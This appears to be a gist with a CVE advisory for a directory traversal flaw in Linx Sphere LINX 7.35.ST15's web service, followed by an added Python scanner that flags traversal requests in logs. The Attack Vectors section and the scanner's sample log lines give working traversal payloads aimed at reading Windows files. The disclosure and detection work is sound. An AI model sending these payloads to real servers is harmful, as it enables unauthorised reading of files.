@robotshell
Created December 12, 2022 08:05
CVE-2022-45269
### Description
A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.
### Additional Information
The affected product runs on a Windows server with IIS 10.0; therefore, only arbitrary Windows files can be read.
### Vulnerability Type
Directory Traversal
### Vendor of Product
Linx Sphere
### Affected Product Code Base
LINX 7.35.ST15 - Versions affected: < LINX 7.35.ST15
### Affected Component
Web service SCS.Web.Server.SPI/1.0 on port 3000
### Attack Type
Remote
### Impact Information Disclosure
True
### Attack Vectors
Exploiting the vulnerability only requires a remote attacker to send the following payload /.../.../.../.../.../.../.../.../.../.../.../.../.../.../.../.../ followed by the file they want to access. Example: http://192.168.1.10:3000/../../../../../../../../../../../../windows/iis.log
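
For defenders reviewing request logs of the service on port 3000, the following added example (not part of the original advisory or of the vendor's code) flags requests whose path contains dot-only segments such as `..` or `...`, including percent-encoded and backslash forms. The log line layout, the client addresses and the sample lines are constructed assumptions; adapt the regular expression to the real log format.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in an assumed "CLIENT METHOD PATH STATUS" layout.
SAMPLE_LOG = """\
192.0.2.7 GET /index.html 200
192.0.2.9 GET /../../../../windows/iis.log 200
192.0.2.9 GET /.../.../.../windows/iis.log 404
192.0.2.9 GET /%2e%2e%5c%2e%2e%5cwindows%5ciis.log 200
192.0.2.9 GET /%252e%252e/%252e%252e/windows/iis.log 200
192.0.2.8 GET /docs/v1.2/release..notes.txt 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")
DOT_SEGMENT = re.compile(r"^\.{2,}$")  # a segment made only of dots: "..", "..."

def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_traversal(path):
    """True if any decoded path segment consists only of two or more dots."""
    normalised = decode_fully(path.split("?", 1)[0]).replace("\\", "/")
    return any(DOT_SEGMENT.match(seg) for seg in normalised.split("/"))

def scan(log_text):
    """Return (client, path, status) for each request with a traversal segment."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and is_traversal(m.group(3)):
            hits.append((m.group(1), m.group(3), int(m.group(4))))
    return hits

if __name__ == "__main__":
    for client, path, status in scan(SAMPLE_LOG):
        outcome = "served" if status == 200 else "rejected"
        print(f"{client} {path} -> {status} ({outcome})")
```

Hits answered with status 200 are the ones to triage first, since they indicate the server returned content for a traversal request.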